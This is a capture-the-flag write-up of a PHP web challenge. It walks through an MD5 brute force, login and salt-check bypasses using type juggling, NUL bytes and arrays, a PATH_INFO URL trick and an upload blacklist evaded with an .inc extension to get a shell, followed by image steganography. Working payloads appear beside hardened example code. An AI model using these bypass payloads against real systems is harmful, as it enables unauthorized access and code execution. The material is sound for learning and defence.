Three White Hats - Roman Series 2 - Writeup
0x00
Why did a perfectly good web challenge turn into misc? There goes the friendship boat!!!!
http://4e79618700b44607c.jie.sangebaimao.com
0x01 Getting the source code
No hints are given, so getting hold of the source has to come first. Right-click, view source: nothing there. Check the response headers instead.
Set-Cookie source=WXpOV2FXTXpVbmxMUnpGclRsTm5hMWd3WkVaV1JuTnVZekk1TVdOdFRteEtNVEJ3VEVSTmMwNXBhemxRVTBrMFRWZEZNRTFxWTJr
Decoding that value (three rounds of base64) gives the check:
```php
substr(md5($_GET['source']),3,6)=="81a427"
```
This looks familiar: a very similar check appeared in BCTF 2016, just slightly different. Lima provided a handy tool for it:
```python
#!/bin/env python
# -*- encoding: utf-8 -*-
import hashlib


def mx(s):
    """Return the hex MD5 digest of the string s."""
    return hashlib.md5(s.encode()).hexdigest()


if __name__ == '__main__':
    m = '81a427'
    # Brute-force a decimal value whose MD5 carries the target at offset 3..9
    for x in range(1, 100000000):
        if mx(str(x))[3:9] == m:
            print(x)
            break
```
Running it gives 47733.
/index.php?source=47733
That returns the download path of the source package: /WoShiYuanMa_SGBM.zip
0x02 Login bypass
```php
$password = unserialize($_POST['password']);
if($_POST['username']='admin' && $password['username'] !== 'admin' && $password['password'] !== 'admin'){
    if ($password['username'] == 'admin' && $password['password']=='admin') {
        $_SESSION['login'] = 1;
        echo "Click jump to the Backstage";
    }
}
```
At first I took it for a PHP unserialize() bug; it turned out to be PHP's loose comparison (==) at work:
```php
(0 == "str")  => true
(0 === "str") => false
```
(Under PHP 8 a non-numeric string no longer compares equal to 0, so this particular trick works on PHP 7 and earlier.)
Construct the POST:
```
username=admin&password=a:2:{s:8:"username";i:0;s:8:"password";i:0;}&submit=1
```
Through ~
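As an added illustration (not the challenge's code), the same login check side by side with a strict version: no unserialize() on client input, the string type enforced, and a stored password hash compared with password_verify(). The hash is generated at runtime purely for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. The original lets the client pick
// the *type* of each field through unserialize(), and "==" then treats
// int 0 == "admin" as true (PHP 7 and earlier).
function loose_login(string $serialized): bool
{
    $p = unserialize($serialized);            // attacker-controlled types
    return is_array($p) && isset($p['username'], $p['password'])
        && $p['username'] !== 'admin' && $p['password'] !== 'admin'
        && $p['username'] == 'admin' && $p['password'] == 'admin';
}

// Hardened: plain POST strings, string type enforced, constant-time strict
// comparison for the user name, password_verify() against a stored hash.
function strict_login($username, $password, string $storedHash): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false;                         // arrays, ints, null: reject
    }
    if (!hash_equals('admin', $username)) {
        return false;
    }
    return password_verify($password, $storedHash);
}

// Demo only: a real application stores the hash, it never hashes a literal.
$hash = password_hash('admin', PASSWORD_DEFAULT);

$payload = 'a:2:{s:8:"username";i:0;s:8:"password";i:0;}';   // the POST above
var_dump(loose_login($payload));              // both fields arrive as int 0
var_dump(strict_login(0, 0, $hash));          // rejected on type alone
var_dump(strict_login('admin', 'admin', $hash));
```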
0x03 Second authentication
```php
if (isset($_POST['salt'])){
    if (ereg("^[a-zA-Z0-9]+$", $_POST['salt']) === FALSE) {
        exit('ereg');
    } elseif (strlen($_POST['salt']) < 11 && $_POST['salt'] > 999999999) {
        if (strpos($_POST['salt'], '*SGBM*') !== FALSE) {
            $_SESSION['admin'] = 1;
            echo "Click jump to the Backstage";
        }
    }
}
```
At first glance it looks pretty cute: the regex only allows alphanumerics, yet the final check demands a `*SGBM*` substring. Hand every function an array instead of a string, though, and:
- ereg() on an array returns NULL,
- strlen() on an array likewise returns NULL,
- Array > int is true,
- strpos() on an array also returns NULL.
(On PHP 5/7 these functions only emit a warning when given an array; ereg() itself was removed in PHP 7.0.)
Construct the POST:
```
salt[]=v&submit=1
```
Again, through ~
The official solution, however, is:
bypass ereg() with %00 (it stops reading at a NUL byte);
then, by PHP's numeric-string comparison rules, 9e9 > 999999999;
intended payload: salt=9e9%00*SGBM*
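As an added example (not the challenge's code), a salt check that closes the three bypasses above: it rejects non-strings, uses a binary-safe anchored preg_match() instead of ereg(), and compares integers rather than numeric strings. It drops the contradictory `*SGBM*` requirement and treats salt purely as a number, which is an assumption about what the check was meant to do.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. Returns a reason string when the
// value is rejected, or null when it passes.
function validate_salt($salt): ?string
{
    // 1. salt[]=v turns $_POST['salt'] into an array; ereg()/strlen()/strpos()
    //    then return NULL instead of failing. Check the type first.
    if (!is_string($salt)) {
        return 'not a string';
    }
    // 2. ereg() stops at the first NUL byte, so "9e9\0*SGBM*" looked like
    //    "9e9". preg_match() is binary-safe; \A and \z anchor the whole
    //    string (a trailing "$" would still allow a final newline).
    if (!preg_match('/\A[a-zA-Z0-9]+\z/', $salt)) {
        return 'bad characters';
    }
    // 3. "9e9" > 999999999 under PHP's numeric-string comparison. When a
    //    number is wanted, require plain digits and compare integers.
    if (!ctype_digit($salt) || strlen($salt) > 10) {
        return 'not a decimal number of at most 10 digits';
    }
    if ((int) $salt <= 999999999) {
        return 'too small';
    }
    return null;
}

// Constructed inputs, one per bypass discussed in the write-up.
$cases = [
    ['v'],             // salt[]=v
    "9e9\0*SGBM*",     // the intended solution
    '9e9',             // exponent notation without the NUL byte
    '1234567890',      // the only shape that should pass
];
foreach ($cases as $c) {
    var_dump(validate_salt($c));
}
```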
0x04 PATH_INFO mode
```php
$URL = $_SERVER['REQUEST_URI'];
$matches = array();
preg_match('/^([a-z\/.]+)$/', $URL, $matches);
if(strpos($URL, './') !== FALSE){
    exit('./');
}else if(strpos($URL, '\\') !== FALSE){
    exit('\\');
}else if(empty($matches) || $matches[1] != $URL){
    exit('empty($matches) || $matches[1] != $URL');
} else if(strpos($URL, '//') !== FALSE){
    exit('//');
} else if(substr($URL, -10) !== '/index.php'){
    exit('substr($URL, -10) !== \'/index.php\'');
} else if(strpos($URL, 'p.') !== FALSE){
    exit('p.');
} else if($URL == '/admin/index.php'){
    exit('$URL == \'/admin/index.php\'');
}else {
    if($URL !== '/admin/index.php'){
        $_SESSION['power'] = 1;
        exit("Click jump to the Backstage");
    }
}
```
Stared at this from start to finish without a solution, until a hint came from the big shot.
Still short on experience ~
LN's tip:
Answer Question (516421987) 1:12:49: with a bit more framework experience you should be able to guess it
Search Baidu for "PATHINFO mode".
URL: /admin/index.php/admin/index.php
Through ~ (REQUEST_URI is the full string, so it is not equal to /admin/index.php, but with PATH_INFO enabled the server still executes /admin/index.php.)
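An added illustration, not the challenge's code: the same decision made on $_SERVER['SCRIPT_NAME'] (the script that actually executes) rather than on REQUEST_URI (the raw client string). The $_SERVER arrays are constructed to look like what Apache sets with AcceptPathInfo on; their exact contents are an assumption for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. Under Apache with AcceptPathInfo,
// /admin/index.php/anything still executes /admin/index.php and the surplus
// lands in PATH_INFO, so a check on REQUEST_URI sees a different string
// than the one the server acted on.

// True if this request really runs /admin/index.php, however the client
// spelled the URL.
function runs_admin_index(array $server): bool
{
    return ($server['SCRIPT_NAME'] ?? '') === '/admin/index.php';
}

// The challenge's last branch, verbatim in spirit: decided on REQUEST_URI.
function looks_like_not_admin(array $server): bool
{
    return ($server['REQUEST_URI'] ?? '') !== '/admin/index.php';
}

// Constructed $_SERVER fragments (values are an assumption for the demo).
$direct = ['REQUEST_URI' => '/admin/index.php',
           'SCRIPT_NAME' => '/admin/index.php'];
$pathinfo = ['REQUEST_URI' => '/admin/index.php/admin/index.php',
             'SCRIPT_NAME' => '/admin/index.php',
             'PATH_INFO'   => '/admin/index.php'];

foreach ([$direct, $pathinfo] as $s) {
    printf("%-34s REQUEST_URI says not admin: %-3s  really runs admin: %s\n",
        $s['REQUEST_URI'],
        looks_like_not_admin($s) ? 'yes' : 'no',
        runs_admin_index($s) ? 'yes' : 'no');
}
// If the application never needs trailing path data, "AcceptPathInfo Off"
// in the Apache configuration removes this ambiguity at the source.
```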
0x05 Fuzzing the upload
```php
if ($_FILES["file"]['size'] > 0 && $_FILES["file"]['size'] < 102400) {
    $typeAccepted = ["image/jpeg", "image/gif", "image/png"];
    $blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"]; // there's always one that suits you
    $filearr = pathinfo($_FILES["file"]["name"]);
    if (!in_array($_FILES["file"]['type'], $typeAccepted)) {
        exit("type error");
    }
    if (in_array($filearr["extension"], $blackext)) {
        exit("extension error");
    }
    $filename = md5(time() . rand(10, 99)) . "." . $filearr["extension"];
    $destination_folder = '../uploads/';
    $destination_folder .= date('Y', time()) . "/" . date('M', time()) . "/";
    $file_name_path = $destination_folder . $filename;
    if (!file_exists($destination_folder)) mkdir('./' . $destination_folder, 0777, true);
    if (move_uploaded_file($_FILES["file"]['tmp_name'], $file_name_path)) {
        exit('upload success!');
    } else {
        exit('upload false!');
    }
}
```
The extension blacklist: `$blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];`
The saved file name: `$filename = md5(time() . rand(10, 99)) . "." . $filearr["extension"];`
So it comes down to fuzzing for an extension the server will still parse.
At first I went through the extensions that usually get parsed, but those are all old hat and blacklisted. Then I remembered there is one more: inc.
If I hadn't just been fiddling with building Phar archives, I would never have remembered this PHP-related extension.
```php
<?php
$phar = new Phar('virink.phar');   // archive name as given in the text below
$phar->buildFromDirectory(dirname(__FILE__) . '/virink');
$phar->setStub($phar->createDefaultStub('virink.php', 'virink.php'));
$phar->compressFiles(Phar::GZ);
?>
```
Generate virink.phar and look at the default stub it contains; you will find:
```php
Extract_Phar::go(true);
$mimes = array(
    'phps' => 2,
    ...,
    'xsd' => 'text/plain',
    'php' => 1,
    'inc' => 1,
    'avi' => 'video/avi',
    ...
```
The stub treats inc exactly like php (value 1 means "execute as PHP"). If the server does the same, changing the extension to inc should get the file parsed.
This challenge really is something.
As for brute-forcing the saved file name, I had already written a PoC in PHP when I started fuzzing:
```php
<?php
// ...
$contents = <<<TEXT
virink
TEXT;
$ext = 'inc';
fuck($ext, $contents);
?>
```
Needs a few small changes, but it will come in handy later.
Getshell successful ~~
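As an added example, not the challenge's code, here is the upload handler rewritten to close the three weaknesses this section walks through (extension blacklist, trusted Content-Type, guessable md5(time().rand) name). The upload directory is a placeholder.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. Three changes:
// 1. extension *whitelist*: a blacklist can never list every extension the
//    server maps to PHP (inc here), a whitelist does not have to;
// 2. content sniffed server-side with finfo instead of trusting $_FILES['type'];
// 3. a random name: time() plus rand(10,99) gives only 90 candidates per second.
function store_upload(array $file, string $uploadDir): string
{
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];

    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] <= 0 || $file['size'] >= 102400) {
        throw new RuntimeException('size error');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('extension error');
    }
    // What the bytes actually are, not what the client claims.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException('type error');
    }
    // Unguessable name; the extension is the whitelist key, not client input.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dir  = rtrim($uploadDir, '/') . '/' . date('Y') . '/' . date('m') . '/';
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        throw new RuntimeException('mkdir failed');
    }
    if (!move_uploaded_file($file['tmp_name'], $dir . $name)) {
        throw new RuntimeException('upload false!');
    }
    return $dir . $name;
}

// Keep $uploadDir outside the document root (or deny script execution there
// in the web server config) so even a mis-classified file is never executed.
if (isset($_FILES['file'])) {
    echo store_upload($_FILES['file'], __DIR__ . '/../uploads_private'), "\n";
}
```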
0x06 What on earth? Misc
Getshell is where it really starts to hurt!
Imstudy (214329772) 1:44:30: I said the shell was broken, you didn't believe me.
Right, Imstudy is the challenge author. Boy, pick up the spiked club in your hand and keep the security card intact ~~
After connecting with Caidao (the "kitchen knife" webshell client), I found that /var/www/mesh holds an image, flag.jpg.
With the trusty tools Stegsolve + WinHex, extracted the embedded flag.txt.
But it is not the real flag: it is N lines in (x, y, z) format with values between 0 and 255, which I guessed were RGB values.
So the picture has to be reassembled.
Counting the lines: the count is not a perfect square, so the image is not square either.
Quietly knocked out a PoC, and the picture came back together perfectly.
```python
#!/bin/env python
# -*- encoding: utf-8 -*-
# __author__: virink
from PIL import Image
import math

if __name__ == '__main__':
    count = len(open('flag.txt', 'r').readlines())
    j = int(math.sqrt(count))
    i = j + 2
    # search near sqrt(count) for a width/height pair whose product is the line count
    for k in range(0, i // 4):
        sx = i - k
        sy = j + k
        if (sx * sy) == count:
            break
    c = Image.new("RGB", (sx, sy))
    file = open('flag.txt')
    for x in range(0, sx):
        for y in range(0, sy):
            line = file.readline()        # read one line
            rgb = line.split(",")         # split into r, g, b
            c.putpixel((x, y), (int(rgb[0]), int(rgb[1]), int(rgb[2])))
    c.show()
    c.save("flag.png")
```
Done. At this point my mind is blown!
FLAG : miao{fb49ac8a528901913ea2c664c6a8d6a1}